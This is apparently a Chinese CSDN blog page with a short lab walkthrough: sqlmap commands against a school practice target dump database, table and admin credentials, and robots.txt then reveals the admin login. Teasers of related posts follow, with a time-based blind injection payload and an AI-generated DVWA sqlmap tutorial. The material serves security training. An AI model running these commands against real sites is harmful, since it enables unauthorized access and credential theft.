sqlmap_injection_to admin

最新推荐文章于 2023-11-07 20:42:57 发布
最新推荐文章于 2023-11-07 20:42:57 发布
阅读量201 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 划水日常
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46635165/article/details/108520200
本文详细介绍了如何使用SQLMap工具找到并利用网站的SQL注入漏洞,通过一系列的数据库和表名爆破,最终获取管理员账号密码,成功登录网站后台。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

利用 sqlmap 获得网站后台管理权限

(学校靶机)

0x00,0x01,0x02,0xo…

1,首先找到网站注入点:http://117.167.136.244:28004/index/narticle.php?nid=3100

上命令行扫描数据库:python sqlmap.py -u "http://117.167.136.244:28019/index/narticle.php?nid=3100" --dbs

在这里插入图片描述这里盲猜是 rjxy 这个数据库,继续上命令行,进行数据表的爆破:

python sqlmap.py -u "http://117.167.136.244:28019/index/narticle.php?nid=3100" -D rjxy --tables

在这里插入图片描述得到 数据表,然后看见 manager 这个表,猜测管理员账号密码就放在这张表,继续进行字段以及字段值的爆破:
上命令行:

python sqlmap.py -u "http://117.167.136.244:28000/index/narticle.php?nid=3100" -D rjxy -T manager --columns

以及:
python sqlmap.py -u "http://117.167.136.244:28000/index/narticle.php?nid=3100" -D rjxy -T manager -C "username,password"

最后获得 admin 以及密码;
最后使用robots.txt robot协议查看敏感访问页面,发现:
在这里插入图片描述访问此页面进入登录界面,然后输入管理员账号密码成功进入网站后台。

sqlmap工具的使用
weixin_65633498的博客
04-12 487
若在kail中实验,则协议中需要包含目标主机的真实IP地址.# 测试过程中需注意phpstudy的版本。# 防火墙可能会导致测试失败。获取指定数据库的所有表名。获取表名 ------
【WEB安全】SQLMAP获取后台账号密码
yijinbaiyi的博客
01-21 1662
SQLMAP获取后台账号密码 一. SQLmap SQLMap是一个自动化注入工具,其主要功能是扫描、发现并利用给定的URL的SQL注入漏洞,内置了很多绕过插件。支持的数据库Mysql、Oracle、SQL Server等众多数据库。 二. 常见注入类型 ü 布尔类型盲注,即可以根据返回页面判断条件真假的注入 ü 基于时间的盲注,即不能根据返回页面的内容判断任何信息,要用条件语句查看时间的延迟语句...
SQLmap使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了。
xnxqwzy的博客
09-06 2229
SQLmap是一款「自动化」SQL注入工具,kali自带。路径 /usr/share/sqlmap打开终端,输入sqlmap,出现以下界面,就说明SQLmap「可用」。1、检测「注入点」2、查看所有「数据库」3、查看当前使用的数据库4、查看「数据表」5、查看「字段」6、查看「数据」
SQLMap获取cms 后台管理员账密
QYbkx974的博客
11-07 528
SQLMap是一款专注于sQLv 的工具,堪称神器。SQLmap 基于Python 语言编写的命令行工具,集成在KALI中。
利用sqlmap实战学校靶机
qq_45970858的博客
09-10 317
###利用sqlmap实战学校靶机 通过在用户可控参数中注入 SQL 语法,破坏原有 SQL 结构,达到编写程序时意料之外结果的攻击 行为。 产生原因:程序编写者在处理应用程序和数据库交互时,使用字符串拼接的方式构造SQL语句;编写代码时未对用户可控参数进行足够的过滤便将参数内容拼接进入到SQL语句 1、这是我们需要构造语句,使其注入,尝试后面加上“index/narticle.php?nid=3100”,有语句显示,证明注入成功 2、打开sqlmap,开始操作, 将网站丢到sqlmap里面测试能不能注入
sqlmap基本使用方法
zjc的专栏
05-16 4940
sqlmap是安全测试工具,通常用于对已知的http接口进行sql注入测试,一旦注入成功,可以获取到后台包括数据库表、用户信息、数据内容等多种敏感信息,对web漏洞防范有重要意义。 基本语法 1.先进行注入点探测,常规语法是: python sqlmap.py –u [url] 说明:url 一般选择包括参数输入的链接。如果是get方法,就直接跟在url后面用?补充参数。如果是...
CTF之利用sqlmap获取后台数据
小伟锅的博客
08-26 6895
在攻防阶段利用kali系统中的owasp zap和sqlmap工具配合使用获取网站后台数据库中数据,在攻防阶段有可能在网站数据库表中有一条数据是flag{},即数据表中有flag记录;但在挑战赛阶段若为kali环境下的挑战题目可以利用sqlmap工具实现sql注入,从而获取后台管理员登陆用户名及密码(当然也可以利用burpsuite做代理实现暴力破解获得用户名和密码,但暴力破解需要合适的字典 由于
渗透测试之后台查找,如何查找网站后台
大河之犬的博客
06-26 6172
如果有网站后台入口,我们可以直接登登陆进去。当我们进入到一个网站主页时,想进行对其后台的查找时,我们就可以先随意查看和点击当前网站的页面,浏览下网站的大体页面结构,说不定往往会有很多意想不到的收获哟。当我们尝试不能直接浏览网页找到后台时,我们可以尝试下故意请求不存在的页面,让网页故意显示报错信息,查看网站真实路径,说不定借此作为突破口,可以得到我们想要的后台地址信息。当我们对浏览当前页面后无法直接找到后台地址时,我们应针对它页面后台地址下手,对网站后台地址进行一些猜解和信息收集,进一步去寻找网站后台地址。
Sqlmap详解使用
白白白
09-03 6167
转载自https://www.anquanke.com/post/id/235846 作者:谢公子 感谢作者,内容非常详细。 Sqlmap sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等 Sqlmap采用了以下5种独特的SQL注入技术 基于布尔类型的盲注,即可
安全攻防之SQL注入(通过sqlmap搞定所有问题)
qq_33182083的博客
05-31 511
第一步: sqlmap基于Python,所以首先下载: http://yunpan.cn/QiCBLZtGGTa7U 访问密码 c26e 第二步: 安装Python,将sqlmap解压到Python根目录下; 第三步: 小试牛刀,查看sqlmap版本: python sqlmap/sqlmap.py -h 第四步: 通过SQL注入扫描工具扫描网站,找出怀疑有SQL注入问题的URL; 推荐 啄木鸟...
使用sqlmap对某php网站进行注入实战及安全防范
weixin_34150830的博客
05-30 1921
使用sqlmap对某php网站进行注入实战   一般来讲一旦网站存在sql注入漏洞,通过sql注入漏洞轻者可以获取数据,严重的将获取webshell以及服务器权限,但在实际漏洞利用和测试过程中,也可能因为服务器配置等情况导致无法获取权限。1.1php注入点的发现及扫描1.使用漏洞扫描工具进行漏洞扫描    将目标url地址放在wvs中进行漏洞扫描,如图1所示,扫描结果显示存在SQL盲注和SQL注入...
sqlmap+nikto进行渗透测试获取管理员账号密码操作实例
WEL测试
10-18 9037
首先,在百度搜索输入框输入:inurl:asp?id=,在搜索列表中选择连接类似如下的url:http://域名/about.asp?id=325。 其次,打开BT5,打开sqlmap,执行如下格式命令:./sqlmap.py -u "http://域名/about.asp?id=325" --dbs --current-user,执行命令如下截图: 该命令是获取web服务操作系统、w
RC4 python实现
qq_46635165的博客
11-06 2693
RC4算法是一种流密码(面向字节操作),密钥长度可变(根据明文长度生成密钥流) RC4加密流程: 1,初始化状态数组S:长度256字节,每个S[i] 为1个字节,S[i]的值为 0-255 2,初始化临时数组T:T的长度为256字节,每个T[i]为1个字节, 首先生成一个密钥数组Key, Key的长度为1~256字节(随机),每个Key[i] 为1个字节,并且每个Key[i] 的值为随机生成的; 然后将数组Key中的每个Key[i]轮流并且循环放入数组 T,比如Key[]=1,2,3,4,5 ,则放入数组T
仿射密码 python实现
qq_46635165的博客
11-07 1773
主要为两个函数的实现: 加密函数 : y = ax+b (mod m), (一般m设置为26) 解密函数:x = a^-1 (y - b) (mod m) , a^-1 为a 的逆元,在用其他语言实现求逆元时需要注意mod 取整问题; 参考代码如下, #coding = utf-8 import math CryptoText = '' PlainText = '' txt = '' a,b,m=0,0,0 # 加密 def encode(): global a,b,CryptoText,txt
SQL injection_Blind-Time based
qq_46635165的博客
09-23 1111
时间盲注: 参阅了许多博客,得到了一个关于时间盲注的通俗易懂的说法,时间盲注是基于布尔盲注的 ,二者 '参照物’略有不同,布尔盲注主要是看页面显示上的差异,比如页面上某一串字符的出现或者消失;但是有的时候页面不会有明显差异变化,这是需要通过时间盲注,主要是通过 sleep() 加 if 判断,通过页面的响应时间的延迟,来做一些判断和注入; 实例:(sqli-labs_Less-9) 可以看到使用布尔盲注页面没有变化: 此时用时间盲注: url/?id=1' and sleep(5) -- + # sle
sql-lab环境搭建(CentOS_宝塔)
qq_46635165的博客
09-12 502
CentOS_to_sql-lab 0x00 (前提:CentOS中安装好了宝塔,安装宝塔链接:bai du yi xia,并且要开启xshell,并建立连接以及提前准备好 sql-lab的压缩包) 打开CentOS, 上命令,查询 ip 地址 : ip addr 0x01 在xshell 中与CentOS 建立连接,然后输入 bt14 ,这是为了查看你的宝塔基本账户密码信息。 0x02 然后在Chrome浏览器中输入 ip(ip是你前面查询到的 ip), 账号密码,进入宝塔控制面板: 接下来,选择网站
SQL injection_POST injection
qq_46635165的博客
09-24 283
实验环境 : sqli-labs_Less-9 POST注入 : 常出现在一些以post方式提交数据的页面,比如账号密码输入框,post注入是通过post传参作为注入点,来实现查询数据库,得到我们想要的信息; 实例: 打开解题网址,一个输入框: 常规测试单引号,出现语法错误提示,到这里,通过burpsuite来实现post注入更加方便: 1,抓包: 闭合语句,然后进行一个单引号注入即可: over! ...
SQL injection-Boolian Based
qq_46635165的博客
09-23 236
sqli-labs_Less-8 布尔盲注: 通过页面的正确与不正确显示状态来获取数据库的信息; 实例: url?id=1 页面显示: url?id=1' 这里可以看到,从url传入参数只会显示一个 You are in … ,并且输出的内容对我们是没用,也没有报错信息显示,因此我们只能靠这个页面的上一串英文字符的出现或者消失来判断我们的 sql 语句是否被数据库执行,进而构造 sql 语句来猜解出数据库中的信息。 1,使用 length() 函数猜解解出当前数据库名的长度:(记得加单引号使后台sq
injection_based
qq_46635165的博客
09-13 231
判断SQL注入点 0x00 判断是否有注入(第一要素) 1)可控参数的改变是否影响页面的显示结果(页面是否与数据库存在交互) 2)输入的 sql 语句,是否能报错(能通过数据库的报错,看到数据库一些语句的痕迹) 3)输入的 sql 语句能否不报错(我们的 sql 语句能否成功闭合) 0x01 判断什么类型的注入 0x02 sql 语句是否能够被恶意修改(第二要素) 0x03 构造的语句是否能够被数据库执行(第三要素) 符合上述条件,基本可以判断存在注入点,然后构造 sql 语句,获取信息. ...
dvwaVulnerability: SQL Injection使用sqlmap
最新发布
03-24
<think>好的,我需要帮助用户了解如何使用sqlmap测试DVWA中的SQL注入漏洞。首先,用户可能需要知道DVWA是一个演练环境,用来学习Web应用的安全漏洞。SQL注入是其中一种常见漏洞,sqlmap是一个自动化检测和利用SQL注入的工具。 根据用户提供的引用,我注意到有几个关键步骤。首先,用户需要确保已经设置好DVWA环境,并且安全级别设置为low,这样漏洞更容易被利用。接下来,用户需要获取当前的PHPSESSID和security cookie,这些信息在引用[1]、[3]、[4]中都有提到。例如,在引用[4]中,命令中包含了--cookie参数,指定了PHPSESSID和security=low。 然后,用户需要构造sqlmap命令,指定目标URL和cookie。引用[1]和[4]中的命令示例显示,使用-u参数指定URL,--cookie提供会话信息。此外,可能需要使用--batch参数让sqlmap自动执行默认选项,避免交互式输入,这在引用[1]和[4]中都有应用。 用户可能需要逐步进行测试,比如先获取数据库名称,然后枚举表,再获取列和数据。引用[1]中提到使用-D dvwa --tables来爆破特定数据库下的表名,而引用[3]则解释了检测结果,说明sqlmap如何识别注入点。 此外,用户需要注意DVWA的配置是否正确,比如URL是否正确,cookie是否有效。如果遇到问题,可能需要检查网络连接或DVWA的安全级别设置。 最后,用户可能需要了解sqlmap的高级选项,如风险级别和漏洞类型,如引用[3]中提到的--risk和--level参数,以调整检测的强度。 总结下来,步骤应该是:1. 设置DVWA环境;2. 获取会话cookie;3. 运行sqlmap命令进行检测;4. 枚举数据库、表、列和数据。同时,用户需要注意命令的正确性和环境配置,确保测试顺利进行。</think>### 如何使用sqlmap测试DVWA的SQL注入漏洞 #### 步骤1:环境准备 1. **启动DVWA环境** 确保DVWA(Damn Vulnerable Web Application)已部署在本地或靶机环境(如`http://dvwa/`或`http://192.168.1.2/dvwa/`)[^2][^4]。 2. **设置安全等级为Low** 登录DVWA后,在"Security"页面将安全级别调整为**Low**,以启用基础漏洞[^3]。 --- #### 步骤2:获取会话Cookie 1. **登录DVWA** 使用默认账号`admin/password`登录,浏览器开发者工具(F12)中查看Cookie,记录`PHPSESSID`和`security=low`的值。 示例Cookie格式: `PHPSESSID=psuncupdhgq2rj4lkp7jp1s1h3; security=low`[^1]。 --- #### 步骤3:构造sqlmap命令 1. **基础探测命令** ```bash sqlmap -u "http://dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "PHPSESSID=xxx; security=low" --batch ``` - `-u`:指定目标URL(需替换实际DVWA地址) - `--cookie`:注入时需携带有效的会话Cookie - `--batch`:自动选择默认选项,避免交互式提问 2. **探测数据库名** ```bash sqlmap -u "目标URL" --cookie "..." --batch --dbs ``` 结果示例: `available databases [2]: [...] dvwa` 3. **爆破表名** ```bash sqlmap -u "目标URL" --cookie "..." -D dvwa --tables ``` 结果示例: `Database: dvwa → [users, guestbook]`[^3] 4. **提取表数据** ```bash sqlmap -u "目标URL" --cookie "..." -D dvwa -T users --dump ``` 示例结果: `+---------+-----------+--------+` `| user_id | password | avatar |` `+---------+-----------+--------+`[^3] --- #### 步骤4:高级参数说明 - **风险等级调整** 使用`--risk 3`允许更高风险操作(如基于时间的盲注)[^3]。 - **指定漏洞类型** 若已知漏洞类型(如报错注入),添加`--technique=E`。 - **代理调试** 通过`--proxy=http://127.0.0.1:8080`将流量导向Burp Suite。 --- #### 注意事项 1. **URL编码问题** 确保URL中的`&`符号正确转义为`&`[^4]。 2. **Windows环境路径** 若在Windows运行,需使用`python sqlmap.py`调用工具。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值